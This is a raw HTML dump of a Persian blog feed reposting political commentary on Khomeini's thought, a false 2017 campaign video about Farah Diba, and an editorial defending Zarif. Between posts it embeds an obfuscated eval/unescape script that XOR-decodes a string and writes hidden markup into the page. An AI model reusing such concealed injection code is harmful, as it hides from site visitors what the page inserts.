کند.<br> &nbsp;انتقاد مراجع در حد توصیه های اخلاقی بود و حفظ اصل سلطنت را به هر رو لازم می دانستند. کما این که انقلاب مشروطه سلطان را کنار نزد. از قدرت مطلق به مشروط بدل کرد و حتی استبداد <span style="font-weight: bold"> محمدعلی شاه</span> کسی را به صرافت برانداختن اصل سلطنت نینداخت.<br> تفاوت مهم امام اما این بود که بعد از سال 42 شخص شاه را مخاطب قرار می دهد.<br> نوع نگاه به نهاد سلطنت و نه شخص شاه او را متفاوت و متمایز ساخته بود. به همین خاطر از 42 به بعد هر گونه ملاقات یا تماس روحانیون ارشد با سلطنت و دربار از نگاه انقلابیون نفی و رد می شد. <br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <span style="font-weight: bold; color: rgb(0, 0, 205)">ترور و فداییان اسلام</span><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="font-weight: bold; color: rgb(0, 0, 205)">8-</span> تفاوت نگاه با روحانیون سنتی اما سبب نشد که به آن سو بگرود و از گروه های مسلح حمایت کند. با این که برای لغو مجازات اعدام <span style="font-weight: bold">سید مجتبی نواب صفوی</span> می کوشد و از اعتبار خود نزد آیت الله بروجردی مایه می گذارد اما شیفته نواب نبود. <br> سال ها بعد که هم آیت الله طالقانی و هم <span style="font-weight: bold"> هاشمی رفسنجانی</span> از او می خواهند مجاهدین خلق را تأیید کند نیز امام چنین نمی کند زیرا به روش مسلحانه باور نداشت و به رغم اصرار و ادعای&nbsp; مؤتلفه برای هیچ تروری فتوا صادر نکرد.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <span style="font-weight: bold; color: rgb(0, 0, 205)">احکام ثانویه</span><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="font-weight: bold; color: rgb(0, 0, 205)">9-</span> یکی از دلایلی که برخی مراجع را از ایده تأسیس حکومت بازمی داشت نگرانی از شیوه حکم رانی و تصمیم گیری در قبال مالیات، بهره بانکی، حق رأی و اشتغال زنان، موسیقی، حرام نبودن مواد مخدر و مانند اینها بود. امام اما در همه اینها تجدید نظر کرد و در حکومتی که خود در رأس آن قرار گرفت مالیات اخذ شد در حالی که در کتاب « ولایت فقیه» خمس و زکات برای اداره جامعه کافی دانسته شده است. <br> بانک ها هم تعطیل نشدند و با ساز و کارهای دیگر به فعالیت بانکی پرداختند. زنان انتخاب کردند و انتخاب شدند و اشتغال آنان منتفی نشد. <br> حجاب اجباری شد اما درعمل آنان که از سر الزام حجاب دارند به رعایت حداقل ها متعهدند و حجاب اکمل که در نگاه کسانی چون مرحوم آیت الله<span style="font-weight: bold"> احمد آذری قمی</span> در خانه نشینی زنان و دیده نشدن توسط غیر محرم ها جلوه می کند از جانب حکومت و شخص امام رواج نیافت.<br> &nbsp;موسیقی هم به دو گونه غنایی و غیر غنایی تقسیم شد و دومی مجال بروز یافت.مواد مخدر ممنوع اعلام شد در حالی که فقه بر حُرمت آن تأکید ندارد و این تفاوت ها البته ناشی از اقتضائات حکومت داری در دنیای مدرن هم بود.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="font-weight: bold; color: rgb(0, 0, 205); background-color: #FFFF00"> ملیت و ایران</span></b><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> <span style="font-weight: bold; color: rgb(0, 0, 205)">10-</span> روحانیون سنتی چندان درگیر مفهوم «ایران» نبودند و نیستند. در قانون اساسی اما برای رییس جمهوری قید «ایرانی الاصل» آمده و به خاطر همین به دستور شخص امام، <span style="font-weight: bold">جلال الدین فارسی</span> کاندیدای حزب جمهوری اسلامی در دوره اول کنار گذاشته شد.<br> هر چند در قانون اساسی برای مقام رهبری قید «ایرانی تبار» نیامده اما روشن است که خبرگان به یک فقیه غیر ایرانی تبار رأی نمی دهند تا در رأس حکومت قرار گیرد.<br> یاهمین که دین زرتشت هم به رسمیت شناخته شده نشان می دهد مفهوم «ایران» مورد توجه بوده چندان که در نخستین پیام های پس از شروع جنگ در سال 1359 رهبر فقید انقلاب به دفعات واژه های «میهن» را به کار می برد و به صرف تعابیر دینی اکتفا نمی کند.<br> مواضع امام علیه «ملی گرایی» بیشتر به خاطر اتفاقات دهه 60 است و نفی ایدیولوژی « ناسیونالیسم» و گرنه اگر به مفهوم ایران و مرزهای جغرافیایی باور نداشت در ابتدا با ورود به خاک عراق پس از بازپس گیری بندر خرمشهر مخالفت نمی کرد.<br> در خاطرات مرحوم <span style="font-weight: bold">سید احمد خمینی</span> آمده که نگران بوده خبر سقوط <span style="font-weight: bold">فاو</span> در سال 67 را چگونه به امام منتقل کند و سرانجام تصمیم می گیرد بگوید و در مقابل با این واکنش رو به رو می شود: « خوب، مال خودشان بود». یعنی فاو را در قالب منطقه ای در جغرافیای عراق می دیده که بنا به مصالح جنگ و برای واداشتن صدام حسین به پرداخت خسارت و خودداری از حمله مجدد در اختیار ایرانی ها بوده است نه این که ما و عراق نداشته باشیم و مرز های جغرافیایی در دنیای مدرن را به رسمیت نشناسد و همه را ذیل «امت» تعریف کند.<br> نکات دیگر را نیز می توان ذکر کرد اما مطلب را طولانی می کند. غرض این است که گفته شود:<br> آیت الله حاج سید روح الله خمینی روحانی و مرجع بود اما با تفاوت ها و تمایزهایی و همین ها بود که از او «امام خمینی» ساخت. <br> هم او که از دل سنت برخاست اما ضد مدرنیته نبود چندان که در اولین نطق رسمی خود در بهشت زهرا ( اگر سخنرانی فرودگاه را در حد تشکر بدانیم) در بیان دلیل مخالف نبودن با سینما می گوید: « سینما یکی از مظاهر تمدن است.»<br> خمینی، خمینی بود نه شیخ فضل الله نوری. نه سید ابوالقاسم کاشانی و نه حتی سید حسن مدرس که آن قدر هم به او علاقه داشت. از این رو برای شناخت او تفاوت ها و تمایزهای 10 گانه را باید شناخت.</b></p></font></div><font face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> </b> </font> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> text/html 2017-06-04T11:13:14+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی نتیجه اقتدا به چرچیل! http://1001SHAYADOBAYAD.mihanblog.com/post/3504 <div class="post"> <div id="MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="tpost"><br></div> <div class="xpost"><div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><b><font face="arial,helvetica,sans-serif" color="#990000"><span style="background-color: rgb(204, 204, 255);"><font size="6"><a href="http://www.khabaronline.ir/detail/672918/root/weblog">&nbsp;&nbsp;&nbsp; نتیجه اقتدا به چرچیل!&nbsp;&nbsp;&nbsp; </a><br></font></span></font></b><span><br><div class="rating-symbol" style="display: inline-block; position: relative;"><div class="rating-symbol-foreground" style="display: inline-block; position: absolute; overflow: hidden; left: 0px; width: auto;"><span class="glyphicon glyphicon-star"></span></div></div><div class="rating-symbol" style="display: inline-block; position: relative;"><div class="rating-symbol-foreground" style="display: inline-block; position: absolute; overflow: hidden; left: 0px; width: auto;"><span class="glyphicon glyphicon-star"></span></div></div><div class="rating-symbol" style="display: inline-block; position: relative;"><div class="rating-symbol-foreground" style="display: inline-block; position: absolute; overflow: hidden; left: 0px; width: auto;"><span class="glyphicon glyphicon-star"></span></div></div><div class="rating-symbol" style="display: inline-block; position: relative;"><div class="rating-symbol-foreground" style="display: inline-block; position: absolute; overflow: hidden; left: 0px; width: auto;"><span class="glyphicon glyphicon-star"></span></div></div><div class="rating-symbol" style="display: inline-block; position: relative;"><div class="rating-symbol-foreground" style="display: inline-block; position: absolute; overflow: hidden; left: 0px; width: auto;"><span class="glyphicon glyphicon-star"></span></div></div></span> <div class="newsToolbar margin-b-md"> <div class="col-md-8 text-left"> <br><span class="margin-l-md">یکشنبه 14 خرداد 1396&nbsp;</span>&nbsp; </div> </div> <div class="row"> <div class="newsBodyCont col-sm-12"> <div class="newsTitle"> <span></span> <h2><br></h2> </div> <div class="newsPhoto"> <img src="http://images.khabaronline.ir/images/2017/6/position50/16-10-29-124213index1.jpg" class="thumbnail" height="309" width="467"> </div> <div class="leadCont"> <p align="justify"> <font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><b><font face="Mihan-Koodak"><span><span style="background-color: rgb(255, 255, 204);">وبلاگ&nbsp; نوروزپور، محمدرضا ، خبرآنلاین :&nbsp;</span> </span>چرچیل نخست وزیر اسبق انگلیس می‌گفت: «تا حقیقت بخواهد شلوارش را پا کند، دروغ نصف دنیا را گرفته است.» </font></b></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"> </font></b></font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"> </font></b></font></span></font><div class=" clear" align="justify"> </div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"> </font></b></font></span></font><div class="newsToolbar col-sm-12 margin-b-md"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"> </font></b></font></span></font><p align="justify"><font size="4" face="arial,helvetica,sans-serif" color="#000099"><span style="background-color: rgb(204, 255, 255);"><b><span style="font-size: 8pt;">"<font size="5">A lie gets halfway around the world before the truth has a chance to get its pants on"</font><br></span><span style="font-size: 8pt;"><br><font size="5">برخی افراد که برخلاف فرموده مولا امیرالمومنین (ع) در نهج البلاغه، گمان می کنند از راه شر و گناه می توانند به خیر و صواب برسند، در ایام تبلیغات انتخاباتی به جای اقتدا به مولا علی (علیه السلام)، به چرچیل اقتدا کرده و به دروغ فیلمی از فرح دیبا منتشر کردند که در انتخابات شرکت کرده و به حسن روحانی رأی داده است تا ازاین طریق احساسات مردم مذهبی و انقلابی را علیه رقیب خود بشورانند.&nbsp;</font></span></b></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"> </font></b></font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><b><font face="Mihan-Koodak">هدف از این حقه‌های کثیف و دروغ گویی های رسوا، عوام مردم بوده اند، اما اینکه افرادی چون برادر نازنین آقا محسن رضایی با آن سوابق طولانی در فرماندهی دفاع مقدس و اطلاعات و ضد اطلاعات و جنگ و عملیات روانی، فریب بخورد مایه بسی تاسف است. <br>الان که می بینم حتی آقا محسن رضایی نیز قربانی این تکنیک عملیات روانی دوستان و هم فکران خودش شده، دیگر تعجب نمی کنم که در این ایام چندین نفر از مومنین و اهل فضل و حتی خبرگانی را می دیدیم که با ناراحتی از این موضوع با من سخن می گفتند و هربار که یکی از ایشان را با استدلال و حجت مجاب می کردم که اصل موضوع دروغ بوده بر شگفتی شان بیشتر افزوده می شد.&nbsp;<br>آقای رضایی که برای ما دهه پنجاهی ها هنوز به خاطر رشادت هایش در دوران دفاع مقدس نازنین و عزیز است، &nbsp;در یک برنامه تلویزیونی با مخاطبان میلیونی گفته است: آمریکایی ها می خواهند از طریق دموکراسی وارد ایران شوند و فرح پهلوی هم رای می دهد!<br>مجری که متوجه شده اقای رضایی گاف داده می گوید : آن تصویر آرشیوی است.<br>و آقا محسن هاج و واج برای کم نیاوردن می گوید: در انتخابات بعدی شرکت می کند <br>ناگوار اینکه ایشان اولینِ خواص نیست که در دام دروغ های بی پایان جریانی که متاسفانه نام ارزشی برخود گذاشته ـ و قطعا حسابشان با ارزشی ها و انقلابی های واقعی جدا است ـ گرفتار می شود و آخرین نفر نیز نخواهد بود. ایشان بارها و بارها با دروغ های شاخ دار خود بر خواص دیگر نیز تاثیر گذاشته و آنها را فریب داده اند که ذکر نمونه های آن &nbsp;خارج از بحث است.&nbsp;<br>همه باید مراقب باشیم و خواص از همه بیشتر چرا که اساس کار عده ای بر این شده است که انقدر دروغ بگویند تا تشخیص سره از ناسره در جامعه، حتی برای خواص و نخبگان هم ممکن نباشد، چه رسد به عوام الناس. آنقدر زشتی فراگیر شود تا فرق زشت و زیبا مشخص نشود.<br>با نهایت تاثر باید گفت ادامه این رویه ضد ارزشی و ضد دینی که از بد روزگار با همین زرورق، کادو پیچ و به بازار ارائه می شود کل جامعه را به ورطه هلاکت خواهد انداخت. در این صورت در جامعه ای زندگی خواهیم کرد که اساس هرچه می شنویم را باید بر دروغ بگذاریم مگر اینکه عکسش ثابت شود. </font></b></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"></font></b></font></span></font><br><span class="keyWords"><span>&nbsp;&nbsp; <strong> <b> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <span style="font-weight: 700; background-color: #F2F2F2"><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی&nbsp; </font> </span> </b> </span></font> </b> </strong> <br><br></span> </span> </div></div></div> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/محمدرضا نوروزپور">محمدرضا نوروزپور</a>، <a href="/post/tag/انتخابات ریاست جمهوری دوازدهم">انتخابات ریاست جمهوری دوازدهم</a>، <a href="/post/tag/محسن رضایی">محسن رضایی</a>، <a href="/post/tag/چرچیل">چرچیل</a>، <a href="/post/tag/دروغ">دروغ</a>، <a href="/post/tag/مردم عوام">مردم عوام</a>،<br></font><br><br></font> </div></div> <script type="text/javascript"> eval(unescape('%66%75%6e%63%74%69%6f%6e%20%71%35%62%61%64%38%63%35%36%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%35%36%31%35%34%39%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%32%31%33%36%36%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%36%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%71%35%62%61%64%38%63%35%36%28%27') + '%31%5e%6a%71%18%69%6b%75%64%5e%34%1a%77%64%5e%67%63%36%34%28%2c%37%6f%5c%74%68%20%5b%6f%62%63%6c%31%5b%5d%69%6d%59%6a%32%60%60%69%6c%23%68%65%76%5e%37%34%6c%69%35%54%68%64%6d%69%32%1f%5e%32%37%59%2d%2a%3c%63%5d%67%64%64%6c%35%2f%2c%33%67%66%60%5a%6c%30%69%65%63%63%6d%33%1a%3f%36%55%39%34%64%6c%6e%6c%1b%6e%65%72%58%37%15%2a%1e%3c%2d%32%34%28%63%6f%6e%69%38%3f%28%5e%3c%06%30%59%1b%61%6a%59%67%37%15%63%6c%6a%6f%32%2b%28%72%77%77%2f%5c%6f%68%63%69%60%65%6a%29%60%6a%2f%1b%1a%67%5a%6e%65%5a%68%35%1d%5a%5a%60%5c%68%6c%1d%3a%32%65%6f%6a%6f%19%5b%6f%61%69%65%36%1e%19%2b%28%2c%2f%2d%28%1a%3f%1a%58%5e%5e%62%6c%67%18%4f%61%59%61%58%6d%13%3d%71%1e%33%5a%3a%3d%65%6f%67%1d%4d%6c%62%6a%1e%33%2f%5e%39%35%2f%66%6e%68%67%39%34%2d%5e%3e%34%5d%3b%30%66%6e%68%67%1b%6f%67%71%59%35%1d%28%1a%3e%33%28%3f%28%62%6d%6d%68%3a%37%2a%5a%3e%31%29%57%62%72%3c%33%2f%5c%62%73%3e%30%2e%5e%6a%71%3a%32%5b%65%72%1b%5e%60%5d%6a%6d%3e%66%59%67%6d%60%3a%37%5d%65%76%1d%5d%6f%5a%6f%69%32%61%5d%69%6c%3e7561549%37%30%39%31%32%34%35' + unescape('%27%29%29%3b'));</script></div> text/html 2017-06-03T10:30:58+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی جمهوری اسلامی: مصونیت آهنین و تریبون مفت http://1001SHAYADOBAYAD.mihanblog.com/post/3503 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> &nbsp;<p> <b> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></b></p></div><b> </b></div><b> </b> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <h2>&nbsp;</h2> <h1 style="margin: 0px; padding: 0px" class="title"> <span style="letter-spacing: 3pt; vertical-align: bottom"> <font face="Arial"> <a href="http://aftabnews.ir/fa/news/449801/مصونیت-آهنین-و-تریبون-مفتجمهوری-اسلامی-خطاب-به-نبویان‌-حرمت-عباوعمامه‌تان-را-نگه-نمی‌دارید-انتظاردارید-مردم-برای-رای‌دادن-حرفتان-را-گوش-کنند-کی-تمام-می‌شود-این-حرف‌های-بی‌سند"> <span style="text-decoration: overline; background-color: #FFFFCC">&nbsp;جمهوری اسلامی:</span><span style="text-decoration: overline; background-color: #F2F2F2"> مصونیت آهنین و تریبون مفت</span></a><span style="text-decoration: overline; background-color: #F2F2F2"><font color="#0000FF"><u>&nbsp;&nbsp; </u></font></span></font></span></h1> <p>&nbsp;</p> <p style="line-height: 70px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> <p style="line-height: 50px; margin-top: 0; margin-bottom: 0"> <font size="5"> <br> </font> <img src="http://aftabnews.ir/files/fa/news/1396/3/11/135523_665.jpg" title="مصونیت آهنین و تریبون مفت/باید داغ شود پشت دستی که چنین تهمت می‌زند" alt="مصونیت آهنین و تریبون مفت/باید داغ شود پشت دستی که چنین تهمت می‌زند" style="border: 0px none" class="img-responsive-news" width="500"></p> <p style="line-height: 50px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> </font></b><p style="line-height: 60px; margin-top: 0; margin-bottom: 0"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font></b> <span style="letter-spacing: -1pt; vertical-align: bottom"> <font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp;&nbsp;&nbsp; یک دست محکم باید یقه این فرد و دیگر درشت‌گویان را بگیرد و پای میز محاکمه بکشاند تا ثابت کنند ادعای خود را. اگر ثابت کردند که دکتر ظریف، به آمریکا تعهد تسلیم سردار سلیمانی را داده است، یقه وزیر خارجه را بگیرند و اصلا تیربارانش کنند،‌ اما اگر نتوانست ثابت کند، لا‌اقل به چند سیلی آب‌دار بیدارش کنند./ بالاخره یک جا باید تمام شود این حرف‌های بی‌سند. باید تمام شود بی‌اخلاقی کسانی که خود را پشت حصن فولادین « لایسئل عنه» می‌پندارند و تا به حال هر تهمتی که زده‌اند، کسی سراغ ابروی پشت چشم‌شان را نگرفته است. همین هم پر‌رویی‌شان را از وقاحت هم بالاتر برده است. باید داغ شود پشت دستی که چنین ناجوانمردانه، تهمت می‌زند و خط و نشان می‌کشد. /اگر یک بار یقه‌شان گرفته شود، سر جای خود می‌نشینند نه سر جایی که حق‌شان نیست./ این برخورد می‌تواند همه گزافه‌گویان پر حرف را پاسخی معیار باشد تا هرجا تریبون مفت یافتند، حرف مفت نزنند.</b></font></span></p> <p style="line-height: 50px; margin-top: 0; margin-bottom: 0"> <span style="text-decoration: overline blink; background-color: #FFFF00"> <a href="http://faaseleh.blogsky.com/1396/03/13/post-242/" title="شنبه 13 خرداد 1396"> <font size="5" face="Arial"><font size="6">&nbsp; متن کامل&nbsp;</font> </font></a></span></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 